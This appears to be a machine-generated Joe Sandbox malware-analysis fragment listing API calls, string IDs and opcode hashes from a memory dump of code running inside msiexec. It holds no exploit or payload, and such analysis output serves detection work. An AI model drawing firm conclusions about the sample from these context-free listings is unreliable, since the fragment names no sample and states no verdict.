                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2605342592-0
                                                                                          • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                          • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2678498856-0
                                                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Item
                                                                                          • String ID:
                                                                                          • API String ID: 3888421826-0
                                                                                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00417B7B
                                                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                                                          • String ID:
                                                                                          • API String ID: 3727323765-0
                                                                                          • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                          • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2754987064-0
                                                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2754987064-0
                                                                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00402FD7
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                          • strlen.MSVCRT ref: 00403006
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2754987064-0
                                                                                          • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                          • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscpy$CloseHandle
                                                                                          • String ID: General
                                                                                          • API String ID: 3722638380-26480598
                                                                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                          APIs
                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                          • String ID:
                                                                                          • API String ID: 764393265-0
                                                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                          APIs
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                          • String ID:
                                                                                          • API String ID: 979780441-0
                                                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                          • String ID:
                                                                                          • API String ID: 1386444988-0
                                                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID:
                                                                                          • API String ID: 613200358-0
                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: InvalidateMessageRectSend
                                                                                          • String ID: d=E
                                                                                          • API String ID: 909852535-3703654223
                                                                                          • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                          • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                          APIs
                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$memcpywcslen
                                                                                          • String ID: "
                                                                                          • API String ID: 1983396471-123907689
                                                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                          APIs
                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                          • _memicmp.MSVCRT ref: 0040C00D
                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FilePointer_memicmpmemcpy
                                                                                          • String ID: URL
                                                                                          • API String ID: 2108176848-3574463123
                                                                                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                          APIs
                                                                                          • _snwprintf.MSVCRT ref: 0040A398
                                                                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _snwprintfmemcpy
                                                                                          • String ID: %2.2X
                                                                                          • API String ID: 2789212964-323797159
                                                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _snwprintf
                                                                                          • String ID: %%-%d.%ds
                                                                                          • API String ID: 3988819677-2008345750
                                                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendmemset
                                                                                          • String ID: F^@
                                                                                          • API String ID: 568519121-3652327722
                                                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PlacementWindowmemset
                                                                                          • String ID: WinPos
                                                                                          • API String ID: 4036792311-2823255486
                                                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@DeleteObject
                                                                                          • String ID: r!A
                                                                                          • API String ID: 1103273653-628097481
                                                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                          APIs
                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                          • String ID: _lng.ini
                                                                                          • API String ID: 383090722-1948609170
                                                                                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                          APIs
                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                          • API String ID: 2773794195-880857682
                                                                                          • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                          • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                          • memset.MSVCRT ref: 0042BAAE
                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memset
                                                                                          • String ID:
                                                                                          • API String ID: 438689982-0
                                                                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                          APIs
                                                                                            • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@$memset
                                                                                          • String ID:
                                                                                          • API String ID: 1860491036-0
                                                                                          • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                          • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                          APIs
                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                          • free.MSVCRT ref: 0040A908
                                                                                          • free.MSVCRT ref: 0040A92B
                                                                                          • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
